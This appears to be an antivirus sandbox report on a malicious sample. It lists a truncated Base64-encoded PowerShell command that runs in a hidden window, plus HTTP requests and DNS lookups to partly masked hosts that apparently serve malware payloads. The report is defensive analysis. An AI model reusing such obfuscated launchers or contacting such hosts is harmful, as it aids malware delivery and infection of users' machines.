Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAGEAbQB5ADMAZwBnAD0AKAAnAFkAJwArACgAJwB5ACcAKwAnADMAawAnACkAKwAoACcANQBfACcAKwAnADkAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AFUAUw...
Network activity
TCP
HTTP GET requests
- http://sh##.#ihchina.com/validators/smjsb/
- http://www.ti###pps.com/wisedevs/1Zw9/
- http://vz#####rnational.com.br/wp-content/GeaNtEsv/
UDP
- DNS ASK sk###kam.com
- DNS ASK sh##.#ihchina.com
- DNS ASK en##ra.in
- DNS ASK is###anone.com
- DNS ASK ti###pps.com
- DNS ASK bl#####.inovany.com.br
- DNS ASK vz#####rnational.com.br
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAGEAbQB5ADMAZwBnAD0AKAAnAFkAJwArACgAJwB5ACcAKwAnADMAawAnACkAKwAoACcANQBfACcAKwAnADkAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AFUAUw...' (with hidden window)
